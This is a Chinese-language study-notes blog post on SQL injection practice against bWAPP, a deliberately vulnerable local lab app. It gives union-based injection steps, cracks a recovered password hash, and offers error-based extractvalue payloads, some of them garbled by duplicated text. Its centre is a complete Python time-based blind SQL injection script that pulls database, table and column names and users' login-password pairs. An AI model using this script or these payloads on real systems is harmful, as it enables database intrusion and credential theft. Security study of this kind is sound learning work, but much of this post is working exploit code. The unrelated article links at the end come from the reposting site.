Bwapp学习笔记

1.基本sql语句

#求绝对值

select abs(-1) from dual;

#取余数

select mod(10,3);

#验证show databases结果是取之于schemata表的

show databases;

select schema_name from information_schema.schemata;

#查询当前的数据库

select database();

-- 查询数据库版本

select version();

select user();

#查询当前时间

select now();

-- 查看数据路径

select @@datadir;

-- 安装路径

select @@basedir;

-- 摸拟数据

-- create database test;

-- use test;

-- create table t1(id int);

-- insert into t1 values(1),(2),(3)

select* from t1;

-- 已知库名去查询库下面所有的表名 下面两条等价

-- select* from information_schema.tables where table_schema=database()

select* from information_schema.tables where table_schema='test'

-- 已知表名查询这个表下所有的字段名

-- user

-- id name age sex user_name password

select column_name from information_schema.columns where table_name='t1'

-- union

select* from t1;

select * from t1 union select version()

select * from t1 where id=1 or 1=1

SQL注入漏洞是什么?

是发生于应用程序与数据库层的安全漏洞。网站内部直接发送的SQL请求一般不会有危险,但实际情况是很多时候需要结合用户的输入数据动态构造SQL语句,如果用户输入的数据被构造成恶意SQL代码,Web应用又未对动态构造的SQL语句使用的参数进行审查,则会带来意想不到的危险。

GET型SQL注入漏洞是什么?

我们在提交网页内容时候,主要分为GET方法,POST方法,GET方法提交的内容会显现在网页URL上,通过对URL连接进行构造,可以获得超出权限的信息内容。

加一个单引号,再将后面的代码注释,后面的就不起作用了

联合查询注入

案例1

获取所有的Gifts的商品

获取所有的商品

先判断返回字段个数,使用union select 1,2,3,一直往上加直到不报错

需求3-1分析所有显示字段在数据库里的类型,我们要找到字符类型的字段替换对应位置的字段为我们想要的数据,比如version(),user(),database()

找到当前数据库名称之后

需求3-2通过已知数据库名称,得到该数据库下所有的表名,分析哪个是用户表

需求3-3通过分析得出用户表,假设是user,得到该表下所有的字段,分析哪些字段我们可以利用

3-4查询分析字段,得出结果

案例2

需求1:拿到当前登录数据库的用户名,数据库的名称

1.先试着select 得到下面这个结果

2.将对应位置的数字替换成函数:

3. 已知库名——通过库名找到该库下所有的表—分析所有表名——找到户用户表——已知表名—通过表名得到该表下所有字段名一分析所有字段名(哪个字段是用户,哪个字段是密码)——查询你想要的字段

找到该库下所有的表:

当limit 3,1时出现users (数据库里面还有blog,heroes,movies,visitors表)

改变limit 的值,一个一个试,发现login,password,secret等列

将对应的数字换成函数,查找用户名(A.I.M)和密码密文(6885858486f31043e5839c735d99457f045affd0):

用网站cmd5(md5在线解密破解,md5解密加密)解密得到密码是bug

回归测试

输入a出现带有a的电影名,

源码:

输入:a’ and ‘1’=’1’ #没有数据返回,猜测服务端写的是like语句,因为like是%闭合的,不是单引号闭合的。

相当于:"SELECT * FROM movies WHERE title LIKE '%". a’ and ‘1’=‘1’ #."%'"; 

怎么看源码:

基于时间盲注

案例1

# requests.session():维持会话,可以让我们在跨请求时保存某些参数

import requests

# 实例化session
s = requests.session()

# 目标url
login_url = 'http://127.0.0.1/bwapp/login.php'

# 设置参数(
form_data = dict(
   
login = "bee",
   
password = "bug",
   
security_leveL = 0,
   
form = 'submit'
)
res = s.post(login_url, form_data)

print(res.text)

登陆成功显示:

盲注

# requests.session():维持会话,可以让我们在跨请求时保存某些参数
#4,6,6,5,8 blog,heroes,movies,users,visitors
import requests
import time
# 实例化session
s = requests.session()

# 目标url
login_url = 'http://127.0.0.1/bwapp/login.php'

# 设置参数
form_data = dict(
   
login = "bee",
   
password = "bug",
   
security_leveL = 0,
   
form = 'submit'
)
res = s.post(login_url, form_data)

#print(res.text)

#
获取数据库名称长度
def get_database_name_length() -> int:
    count=
0
   
"""
    1.
获取数据库名称长度
    2.盲注的方式
    Iron Man' and length(database())=? and sleep(2)--
    3.
循环长度1,2,3,4......50
    4.
请求
    """
   
for i in range(50):
        url =
"http://127.0.0.1/bwapp/sqli_15.php?title=Iron Man' and length(database())={} and sleep(2) -- &action=search".format(i)
       
#请求前的本机时间
       
start_time=time.time()
        s.get(url)
       
#请求后花费时间
       
if time.time()-start_time >1:
           
print('数据库长度是{}'.format(i))
            count=i

   
return count


#获取数据库名称
def get_database_name(count):
   
"""
    1.
数据库名长度
    2.盲注方式
     Iron Man' and substr(database(),?,1)='? and sleep(2)--
    """
   
for i in range(count+1):
       
for j in range(33,128):
            url =
"http://127.0.0.1/bwapp/sqli_15.php?title=Iron Man' and ascii(substr(database(),{},1))={} and sleep(2) -- &action=search".format(
                i,j)
           
# 请求前的本机时间
           
start_time = time.time()
            s.get(url)
           
# 请求后花费时间
           
if time.time() - start_time >2:
                
print(chr(j))

#拿到表个数
def get_table_count() ->int:
    count=
0
   
"""
    1.
拿到bwapp这个库下表的个数
    2.盲注方式
    Iron Man' and(select count(table_name) from information_schema.TABLES where table_schema='bwapp')=?
    """
   
for i in range(50):
        url =
"http://127.0.0.1/bwapp/sqli_15.php?title=Iron Man' and(select count(table_name) from information_schema.TABLES where table_schema='bwapp')={} and sleep(2) -- &action=search".format(
            i)
       
# 请求前的本机时间
       
start_time = time.time()
        s.get(url)
       
# 请求后花费时间
       
if time.time() - start_time > 1:
           
print('共有{}个表'.format(i))
            count = i

   
return count

#拿到每张表名的长度
def get_table_length_of_each_table(count):
   
"""
    1.
拿到每张表的长度
    2.盲注方式
    length(table_name) limit
    """
    #i
表示第i个表 ,j是每个表的长度
   
for i in range(count+1):
       
for j in range(50):
            url =
"http://127.0.0.1/bwapp/sqli_15.php?title=Iron Man' and (select length(table_name) from information_schema.TABLES where table_schema='bwapp' limit {},1)={} and sleep(2) -- &action=search".format(i,j)
           
# 请求前的本机时间
            
start_time = time.time()
            s.get(url)
           
# 请求后花费时间
           
if time.time() - start_time >2:
               
print('='*20)
               
print('表长: ',j)
                get_table_name_of_each_table(i,j)


#拿到表名
def get_table_name_of_each_table(index,count):
   
#count是每张表的长度,index是数据库中表的数量
   
for i in range(count+1):
       
for j in range(33,128):
            url =
"http://127.0.0.1/bwapp/sqli_15.php?title=Iron Man' and ascii(substr((select table_name from information_schema.TABLES where table_schema='bwapp' limit {},1),{},1))={} and sleep(2) -- &action=search".format(index,i,j)
           
# 请求前的本机时间
           
start_time = time.time()
            s.get(url)
           
# 请求后花费时间
           
if time.time() - start_time >2:
               
print(chr(j))
#已知表名users
#
拿到users这个表的字段个数
def get_column_count()->int:
    count =
0
   
for i in range(50):
        url =
"http://127.0.0.1/bwapp/sqli_15.php?title=Iron Man' and(select count(column_name) from information_schema.columns where table_name='users')={} and sleep(2) -- &action=search".format(
            i)
       
# 请求前的本机时间
       
start_time = time.time()
        s.get(url)
       
# 请求后花费时间
       
if time.time() - start_time >2:
           
print('共有{}个列'.format(i))
            count = i

   
return count

#拿到每张表字段的长度
def get_column_length_of_each_column(count):
   
for i in range(count+1):
       
for j in range(50):
            url =
"http://127.0.0.1/bwapp/sqli_15.php?title=Iron Man' and (select length(column_name) from information_schema.columns where table_name='users' limit {},1)={} and sleep(2) -- &action=search".format(i,j)
           
# 请求前的本机时间
           
start_time = time.time()
            s.get(url)
           
# 请求后花费时间
           
if time.time() - start_time >2:
               
print('='*20)
               
print('列长: ',j)
                get_column_name_of_each_table(i,j)

#获取字段名
def get_column_name_of_each_table(index,count):
   
for i in range(count+1):
       
for j in range(33,128):
            url =
"http://127.0.0.1/bwapp/sqli_15.php?title=Iron Man' and ascii(substr((select column_name from information_schema.columns where table_name='users' limit {},1),{},1))={} and sleep(2) -- &action=search".format(index,i,j)
           
# 请求前的本机时间
           
start_time = time.time()
            s.get(url)
           
# 请求后花费时间
           
if time.time() - start_time >2:
               
print('列名字是:',chr(j))


def get_user_name_password():
    data=[]
   
for i in range(50):
       
for j in range(33,128):
            url =
"http://127.0.0.1/bwapp/sqli_15.php?title=Iron Man' and ascii(substr((select concat(login,'-',password)from users limit 0,1),{},1))={} and sleep(2) -- &action=search".format(i,j)
           
# 请求前的本机时间
           
start_time = time.time()
            s.get(url)
           
# 请求后花费时间
           
if time.time() - start_time >2:
               
print(chr(j))
                data.append(
chr(j))
   
print('.'.join(data))

if __name__=='__main__':
   
#get_database_name_length()
    #get_database_name(get_database_name_length())
    #get_table_count()
    #get_table_length_of_each_table(get_table_count())
    #get_column_length_of_each_column(get_column_count())
   
get_user_name_password()

 

floor报错注入(可以用来判断表里面是否有两个列字段):

无论多少次都是011011,因为product里面有6条数据,当插入第二个1时会报错

例:

运行结果:可以得到数据库版本信息5.7.33

运行结果:得到数据库名:sql_inject

==========================================================

运行结果:没有完全爆出数据库版本

运行结果:完全爆出数据库名:sql_inject

为什么加一个0x7e就能爆出呢:因为0x7e是’ ~ ‘ 数据库不认识,认为它是错的,所以从~处就开始报错。

运行结果:

#获取这个库下所有的表名

1'and extractvalue(1,concat(0x7e,(select1'and extractvalue(1,concat(0x7e,(select table name from information schema.tablestable name from information schema.tables where table schema='bWAPP'limit 0,1)))#

#获取到users表下所有的字段:

1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columnscolumn_name from information_schema.columns where table_name='users' limit 1,1)))#

#限制回显32位

1'and extractvalue(1,concat(0x7e,(select1'and extractvalue(1,concat(0x7e,(select login from users limit e,1)))#

先拿前26个密码:

再拿后面剩余的密码:

updataxml()updataxml(xml_doc,xpath_string,new_value)updataxml(1,xpath_string,1)extractvalue(xml_doc,xpath_string)extractvalue(1,xpath_string)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/223488.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

HTML5刷题笔记

在 HTML5 中,onblur 和 onfocus 是:事件属性 onblur 和 onfocus 属于焦点事件: onblur:失去焦点 onfocus:获取焦点 HTML5事件window 事件属性 针对 window 对象触发的事件: onafterprint script 文档…

Python入门学习篇(六)——for循环while循环

1 for循环 1.1 常规for循环 1.1.1 语法结构 for 变量名 in 可迭代对象:# 遍历对象时执行的代码 else:# 当for循环全部正常运行完(没有报错和执行break)后执行的代码1.1.2 示例代码 print("----->学生检查系统<------") student_lists["张三",&qu…

Python运算符函数化模块

文章目录 标准运算符替代函数实用工具itemgetterattrgettermethodcaller 刷完这60个标准库模块&#xff0c;成为Python骨灰级玩家 作为编程语言&#xff0c;如果无法做到Lisp的括号风格&#xff0c;那么必然羞于承认自己是函数式。python的lambda表达式以及各种生成式&#xf…

网络基础知识制作网线了解、集线器、交换机与路由器

目录 一、网线的制作 1.1、材料 1.2、网线的标准类别 二、集线器、交换机介绍 2.1、概念&#xff1a; 2.2、OSI七层模型 2.3、TCP/IP四层 三、路由器的配置 3.1、概念 3.2、四个模块 1、 网络状态 2、设备管理 3、应用管理 无人设备接入控制 无线桥接 信号调节…

基于多反应堆的高并发服务器【C/C++/Reactor】(中)ChannelMap 模块的实现

&#xff08;三&#xff09;ChannelMap 模块的实现 这个模块其实就是为Channel来服务的&#xff0c;前面讲了Channel这个结构体里边它封装了文件描述符。假如说我们得到了某一个文件描述符&#xff0c;需要基于这个文件描述符进行它对应的事件处理&#xff0c;那怎么办呢&…

面试官:看你简历了解过并发,我们简单聊一聊

前言&#xff1a; 今天和大家探讨最近的面试题&#xff0c;好久没有面试了&#xff0c;所以在此记录一下。本篇文章主要讲解CyclicBarrier和CountDownLatch的知识。该专栏比较适合刚入坑Java的小白以及准备秋招的大佬阅读。 如果文章有什么需要改进的地方欢迎大佬提出&#xf…

HarmonyOS构建第一个ArkTS应用(FA模型)

构建第一个ArkTS应用&#xff08;FA模型&#xff09; 创建ArkTS工程 若首次打开DevEco Studio&#xff0c;请点击Create Project创建工程。如果已经打开了一个工程&#xff0c;请在菜单栏选择File > New > Create Project来创建一个新工程。 选择Application应用开发&a…

Jenkins自动化部署之后端

准备工作参考本人另外几篇Jenkins相关的文章 新建任务 添加参数配置 字符串参数&#xff1a;分支名称 多选框&#xff1a;项目名称&#xff08;Extended Choice Parameter插件必备&#xff0c;插件安装参考我另外的文章&#xff09; 这个分割规则自定义。只要根据Jenkins…

智能优化算法应用:基于爬行动物算法3D无线传感器网络(WSN)覆盖优化 - 附代码

智能优化算法应用&#xff1a;基于爬行动物算法3D无线传感器网络(WSN)覆盖优化 - 附代码 文章目录 智能优化算法应用&#xff1a;基于爬行动物算法3D无线传感器网络(WSN)覆盖优化 - 附代码1.无线传感网络节点模型2.覆盖数学模型及分析3.爬行动物算法4.实验参数设定5.算法结果6.…

代码随想录-刷题第三十六天

435. 无重叠区间 题目链接&#xff1a;435. 无重叠区间 思路&#xff1a;本题与452. 用最少数量的箭引爆气球非常像&#xff0c;弓箭的数量就相当于是非交叉区间的数量&#xff0c;只要把弓箭那道题目代码里射爆气球的判断条件加个等号&#xff08;认为[0&#xff0c;1][1&am…

PostGreSQL:货币类型

货币类型&#xff1a;money money类型存储固定小数精度的货币数字&#xff0c;小数的精度由数据库的lc_monetary设置决定。windows系统下&#xff0c;该配置项位于/data/postgresql.conf文件中&#xff0c;默认配置如下&#xff0c; lc_monetary Chinese (Simplified)_Chi…

WARNING: HADOOP_SECURE_DN_USER has been replaced by HDFS_DATANODE_SECURE_USER.

Hadoop启动时警告&#xff0c;但不影响使用&#xff0c;强迫症的我还是决定寻找解决办法 WARNING: HADOOP_SECURE_DN_USER has been replaced by HDFS_DATANODE_SECURE_USER. Using value of HADOOP_SECURE_DN_USER.原因是Hadoop安装配置于root用户下&#xff0c;对文件需要进…

《PySpark大数据分析实战》-18.什么是数据分析

&#x1f4cb; 博主简介 &#x1f496; 作者简介&#xff1a;大家好&#xff0c;我是wux_labs。&#x1f61c; 热衷于各种主流技术&#xff0c;热爱数据科学、机器学习、云计算、人工智能。 通过了TiDB数据库专员&#xff08;PCTA&#xff09;、TiDB数据库专家&#xff08;PCTP…

计算机网络——数据链路层-点对点协议(组成部分、PPP帧格式、透明传输、差错检测、工作状态)

目录 介绍 组成部分 PPP帧格式 透明传输 字节填充法 比特填充法 差错检测 工作状态 本篇我们介绍点对点协议PPP 介绍 点对点协议PPP&#xff08;Point-to-Point Protocol&#xff09;是目前使用最广泛的点对点数据链路层协议。 请大家想想看&#xff1a;一般的英特…

哈希拓展攻击CTF题做法

目录 基础&#xff1a; 盐&#xff08;Salt&#xff09;&#xff1a; 哈希长度拓展攻击&#xff1a; kali下载相关工具hash-ext-attack&#xff1a; hash拓展题目特征&#xff1a; 哈希拓展ctf题&#xff1a; 2023楚慧杯upload_shell 实验吧之让我进去&#xff1a; 前言…

nodejs微信小程序+python+PHP计算机网络在线考试系统-计算机毕业设计推荐

目 录 摘 要 I ABSTRACT II 目 录 II 第1章 绪论 1 1.1背景及意义 1 1.2 国内外研究概况 1 1.3 研究的内容 1 第2章 相关技术 3 2.1 nodejs简介 4 2.2 express框架介绍 6 2.4 MySQL数据库 4 第3章 系统分析 5 3.1 需求分析 5 3.2 系统可行性分析 5 3.2.1技术可行性&#xff1a;…

编译opencv和opencv_contrib

1 下载源码 下载opencv源码https://github.com/opencv/opencv 下载opencv源码https://github.com/opencv/opencv_contrib 2 开始编译 构建需要下载ffmpeg的包&#xff0c;cmake构建时会自动下载&#xff0c;但是比较满&#xff0c;这里可以从下面链接直接下载 https://downloa…

新版IDEA中Git的使用(一)

说明&#xff1a;本文介绍如何在新版IDEA中使用Git 创建项目 首先&#xff0c;在GitLab里面创建一个项目&#xff08;git_demo&#xff09;&#xff0c;克隆到桌面上。 然后在IDEA中创建一个项目&#xff0c;项目路径放在这个Git文件夹里面。 Git界面 当前分支&Commit …

VSCode软件与SCL编程

原创 NingChao NCLib 博途工控人平时在哪里技术交流博途工控人社群 VSCode简称VSC&#xff0c;是Visual studio code的缩写&#xff0c;是由微软开发的跨平台的轻量级编辑器&#xff0c;支持几乎所有主流的开发语言的语法高亮、代码智能补全、插件扩展、代码对比等&#xff0c…

Java中的抽象abstract

抽象abstract 什么是抽象类抽象类的注意事项、特点 使用好处常见应用场景&#xff1a;模版方法设计模式可以使用final关键字修饰模版方法 什么是抽象类 在Java中有一个关键字叫:abstract&#xff0c;它就是抽象的意思&#xff0c;可以用它修饰类、成员方法。abstract修饰类&am…